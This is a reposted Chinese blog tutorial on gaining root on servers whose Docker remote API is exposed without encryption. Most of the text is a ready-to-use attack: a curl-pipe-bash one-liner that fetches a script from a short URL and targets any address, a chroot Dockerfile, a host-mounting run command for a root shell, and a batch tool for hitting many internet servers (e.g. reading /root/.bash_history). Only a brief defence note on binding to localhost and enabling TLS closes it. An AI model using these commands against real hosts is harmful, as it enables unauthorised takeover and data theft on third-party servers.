一个回车键黑掉一台服务器——使用Docker时不要这么懒啊喂

其他 2018-05-11 01:58:17 阅读次数: 1

不说废话真的一个回车键:

curl -sSL https://git.io/vXNB4 | bash -s test <addr:port>

自己替换<addr:port>的内容,下面是原理与批量扫描测试。

首先我不是什么黑客,也不是什么白帽子,我甚至从未踏进那个圈子,但是前几天闲来无事扫了一下网络上开放的Docker API端口,发现互联网上存在着大量未使用加密传输、直接开放Docker远程API端口的服务器,这些端口允许任何人连接到服务器并使用Docker。

而众所周知,docker这个用户组拥有与root用户基本一样的权限,这意味着我们可以通过这些端口获取服务器的最高权限。

本文代码:https://github.com/izuolan/docker-root-shell
如果你用这个玩意拿到了最高权限也别乱动别人服务器啦~~心疼运维一秒钟~~

一、原理演示

本节是在本地做的一个演示,我才不搞事,笑。先安装Docker,没什么好说的。

1.开启socket

为了更好地演示Docker远程API,我们首先要设置一下本地的Docker daemon启动参数,使其开启socket端口用于返回信息。

根据不同的发行版(这里以Linux为例),开启socket的方式也有不同。

简单来说,使用service命令管理服务的发行版(例如Ubuntu 14.04)可以直接通过修改/etc/default/docker这个文件就可以开启socket:

# Docker Upstart and SysVinit configuration file
#
# THIS FILE DOES NOT APPLY TO SYSTEMD
#
#   Please see the documentation for "systemd drop-ins":
#   https://docs.docker.com/engine/articles/systemd/
#
# Customize location of Docker binary (especially for development testing).
#DOCKERD="/usr/local/bin/dockerd"
# Use DOCKER_OPTS to modify the daemon startup options.
#DOCKER_OPTS="--dns 8.8.8.8 --dns 8.8.4.4"
# 修改下面
DOCKER_OPTS="-H tcp://0.0.0.0:2333 -H unix:///var/run/docker.sock"
# If you need Docker to use an HTTP proxy, it can also be specified here.
#export http_proxy="http://127.0.0.1:3128/"
# This is also a handy place to tweak where Docker's temporary files go.
#export TMPDIR="/mnt/bigdrive/docker-tmp"

然后保存重启Docker:

$ service docker restart

现在你可以使用curl等工具访问本地Docker daemon了。
至于使用systemd管理系统服务的发行版版(例如Ubuntu 16.04),需要在/etc/systemd/system/文件夹中操作,具体如下:
创建文件夹:

$ sudo mkdir /etc/systemd/system/docker.service.d/

新建配置文件,内容如下:

$ sudo vim /etc/systemd/system/docker.service.d/remote-api.conf
[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2333 -H unix:///var/run/docker.sock

注意,ExecStart要输入两次。保存然后重新加载systemd配置并重启Docker:

$ systemctl daemon-reload
$ systemctl restart docker

现在任何人都可以通过docker -H "tcp://<我电脑IP>:<2333>"来执行操作控制我电脑上的Docker,例如docker -H "tcp://<我电脑IP>:<2333>" images查看我电脑上的全部镜像。

2.构建入侵镜像

现在任何人都可以连接到我电脑上的Docker API接口并操作我电脑上的Docker,但是为了获取电脑的Root权限我们还需要一个特殊的镜像,通过这个镜像获取系统最高权限。
镜像Dockerfile非常简单:

FROM busybox
CMD ["chroot","/host_dir","/bin/sh"]

纳尼?就两句话?嗯,准确来说就一句话,通过chroot切换为root的执行环境,chroot这个工具的作用就是Change Root,也就是改变程序执行时所参考的根目录位置。
使用

docker build -t anony/mous .

这样就获得了一个入侵镜像。才几百KB的镜像远程传输起来非常方便。

3.获取系统最高权限

现在到了最后一步,没有什么复杂的操作,我们要的只是运行容器:

docker -H tcp://<被入侵IP>:<API的端口> \
    run -v /:/host_dir \
    --name anonymous \
    --rm -it anony/mous

这个命令大概都能看懂吧,就是把被入侵的主机的根目录/挂载到容器的host_dir目录,然后容器启动时执行chroot /host_dir /bin/sh
这样就获得了被入侵机器的最高权限。现在执行任何操作都是与主机root用户执行的一样。已经没有什么可以阻挡你了。

二、批量测试

原理解释完,我们来看如何批量测试互联网空间上这些未加密的服务器。周末花了点时间写了个脚本,用于测试批量服务器。

1.一个回车键的事

还记得标题说的一个回车键黑掉一台服务器吗?就是下面这句话了,一个回车键你就可以获得对应服务器的最高权限。

curl -sSL https://git.io/vXNB4 | bash -s test <addr:port>

2.批量测试管理

好吧,脚本写着写着就歪楼了,本来是批量测试的脚本变成了集测试、管理于一体的脚本。目前已经集成了如下功能:

  • 快速连接一台服务器
  • 对一台或批量服务器执行命令
  • 添加服务器到列表
  • 从列表删除服务器
  • 测试一台或批量服务器的延迟
  • 测试服务器是否开放了Docker Remote API端口
  • 远程执行Docker命令
Docker Root Shell

1.直接执行该脚本可以查看服务器列表

$ ./docker-root-shell.sh
==========================================================================
  Num   - Alias - Address Port          - CPU Mem       -  Note
==========================================================================
  1     - wo    - 172.16.8.247 2376     - 8 Cu 8 GB     -  Work
  2     - ol    - 172.16.158.90 2376    - 8 Cu 8 GB     -  Online
  ... ...

2.连接到服务器

# 使用别名快速连接到一台服务器
$ ./docker-root-shell.sh con wo

3.对一台或批量服务器执行命令

# 对一台服务器执行命令,指定别名
$ ./docker-root-shell.sh run wo "cat /root/.bash_history"

# 对批量服务器执行命令,使用all
$ ./docker-root-shell.sh run all "cat /etc/hosts"

4.添加一台服务器到列表中

# 别名:地址:端口:CPU:内存:备注
# <>表示必填,[]表示选填,别名不能是纯数字
./docker-root-shell.sh add <alias>:<addr>:<port>:[cpu]:[ram]:[note]
./docker-root-shell.sh add wo2:172.16.168.233:6666

5.从列表中删除一台服务器

./docker-root-shell.sh del <alias>
./docker-root-shell.sh del wo2

6.测试服务器延迟

# 测试全部服务器的延迟
# 输入一个数字,表示每台服务器的发包数量,会输出平均延迟
./docker-root-shell.sh ping <count>
./docker-root-shell.sh ping 1

# 测试一台服务器的延迟只需要指定别名即可
./docker-root-shell.sh ping <alias>
./docker-root-shell.sh ping wo2

7.使用Docker Client远程操作Docker

# 没什么好说的,指定别名,该干嘛干嘛
./docker-root-shell.sh docker <alias> <docker subcommand>
./docker-root-shell.sh docker wo2 images

8.编辑服务器列表

# 需要调整一下就使用这玩意吧,默认编辑器在脚本头部可以设定。
./docker-root-shell.sh edit

三、如何防御

最简单的,如果你需要用第三方工具使用Docker API,但是不需要远程控制,把tcp端口绑定在127.0.0.1就好啦,例如-H "tcp://127.0.0.1:2333",但是如果你要远程使用Docker API,那么还是老实加密吧。

如何加密传输?官方文档很清楚写着了啊~~
https://docs.docker.com/engine/security/https/

总而言之,这种人为漏洞就尽可能避免啦,别偷懒,乖乖♂使用加密。



作者:左蓝
链接:https://www.jianshu.com/p/74aa4723111b
來源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

猜你喜欢

转载自blog.csdn.net/qq_19674905/article/details/80268005
今日推荐
开源日报 | Chrome内置Gemini的意义不在于Gemini;中国AI追随之路的五大误区;ECharts创始人“下海”养鱼;谷歌I/O开发者大会什么都有,只是没有惊喜
微软回应中国区AI团队“打包赴美”传闻
基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个!
美国拟限制 AI 大模型出口中国和俄罗斯
苹果将与 OpenAI 达成协议,将 ChatGPT 应用于 iPhone
openKylin 社区生态委员会第六次会议圆满召开
阿里云正式发布通义千问 2.5
Python 3.13 发布首个 Beta:实验性自由线程模式和 JIT、改进交互式解释器
Stack Overflow 拿我的代码去训练 AI 大模型,还封了我的账号
Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作
《2024 年一季度互联网投融资运行情况》研究报告
报告:Django 仍然是 74% 开发者的首选
周排行
laravle中orm简单的增删改查
文本分类 特征选取之CHI开方检验
Spark核心编程-WordCount
大数据开发实战系列之电信客服(1)
读书笔记 - 把时间当作朋友 by 李笑来
python 笔记--if else
SpringBoot/Mybatis/Druid, 多数据源MultiDataSource配置思路
排序三个整数
redis集群搭建【2】-Windows中Redis集群搭建
STM32F030驱动TM1650点亮4联数码管
每日归档
更多
2024-05-16(6)
2024-05-15(24)
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022